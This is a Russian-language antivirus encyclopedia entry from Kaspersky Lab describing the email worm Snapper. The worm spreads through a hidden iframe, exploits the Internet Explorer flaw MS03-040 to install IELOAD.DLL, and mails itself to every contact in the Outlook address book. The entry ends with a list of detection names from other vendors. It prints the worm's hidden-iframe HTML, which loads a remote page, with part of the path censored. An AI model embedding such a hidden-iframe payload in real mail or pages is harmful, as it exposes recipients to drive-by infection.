RSS-каналы
Уровень опасности: 1
Email-Worm.Win32.Snapper
| Время детектирования | 24 мар 2004 14:29 MSK |
| Время выпуска обновления | 08 апр 2004 16:40 MSK |
| Описание опубликовано | 24 мар 2004 14:29 MSK |
Технические детали
Вирус-червь, распространяющийся через интернет в виде ссылки на зараженный веб-сайт.Зараженные письма содержат в себе HTML код:
<HTML><BODY><IFRAME src='http://198.170.245.129/[censored by KL].htm' style='display:none'></IFRAME></HTML></BODY>
При обращении по данной ссылке происходит использование уязвимости Internet Explorer, описанной в бюллетене MS03-040 (http://www.microsoft.com/technet/security/bulletin/MS03-040.mspx), в результате чего в системе исполняется скриптовый троянец. Данная троянская программа извлекает из себя и устанавливает в систему основной файл червя "IELOAD.DLL".
Червь представляет собой PE DLL-файл, размером около 8KB (8704 байт). Данный файл устанавливается в системный каталог Windows и запускается как системная библиотека.
Червь рассылает письмо со ссылкой по всем адресам электронной почты, найденным в адресной книге MS Outlook. Для отправки писем червь использует указанный в системе SMTP сервер.
Вредоносная программа, обладающая способностью к несанкционированному пользователем саморазмножению по каналам электронной почты. В процессе размножения червь отсылает либо свою копию в виде вложения в электронное письмо, либо ссылку на свой файл, расположенный на каком-либо сетевом ресурсе (например, URL на зараженный файл, расположенный на взломанном или хакерском веб-сайте).
В первом случае код червя активизируется при открытии (запуске) заражённого вложения, во втором — при открытии ссылки на заражённый файл. В обоих случаях эффект одинаков — активизируется код червя.
Для отправки зараженных сообщений почтовые черви используют различные способы. Наиболее распространены:
- прямое подключение к SMTP-серверу, используя встроенную в код червя почтовую библиотеку;
- использование сервисов MS Outlook;
- использование функций Windows MAPI.
Различные методы используются почтовыми червями для поиска почтовых адресов, на которые будут рассылаться зараженные письма. Почтовые черви:
- рассылают себя по всем адресам, обнаруженным в адресной книге MS Outlook;
- считывает адреса из адресной базы WAB;
- сканируют «подходящие» файлы на диске и выделяет в них строки, являющиеся адресами электронной почты;
- отсылают себя по всем адресам, обнаруженным в письмах в почтовом ящике (при этом некоторые почтовые черви «отвечают» на обнаруженные в ящике письма).
Многие черви используют сразу несколько из перечисленных методов. Встречаются также и другие способы поиска адресов электронной почты.
Email-Worm.
- Email-Worm.
Snapper («Лаборатория Касперского») - I-Worm.
Snapper («Лаборатория Касперского») - Trojan:
Generic. dx!ier (McAfee) - W32/Snapper-A (Sophos)
- Exploit.
HTML. Snapper (ClamAV) - Heuristic.
WinPE-Statistical (Panda) - Worm:
Win32/Snapper. A (MS(OneCare)) - Win32.
HLLM. Mistral. 8704 (DrWeb) - Win32/Snapper.
A worm (Nod32) - Backdoor.
Snapper. A@mm (BitDef7) - VBS.
Snapper. A (VirusBuster) - Win32:
Snapper [Wrm] (AVAST) - Email-Worm.
Win32. Snapper (Ikarus) - I-Worm/Snapper.
A (AVG) - WORM/Snapper.
2 (AVIRA) - Trojan.
Vundo (NAV) - W32/Snapper.
A (Norman) - Packer.
Win32. Agent. bk [Suspicious] (Rising) - Email-Worm.
Win32. Snapper [AVP] (FSecure) - WORM_Generic.
DIT (TrendMicro)
© ЗАО «Лаборатория Касперского», 1997-2012
Ведущий производитель систем защиты от вирусов, спама и хакерских атак
Зарегистрированные товарные знаки и знаки обслуживания являются собственностью их правообладателей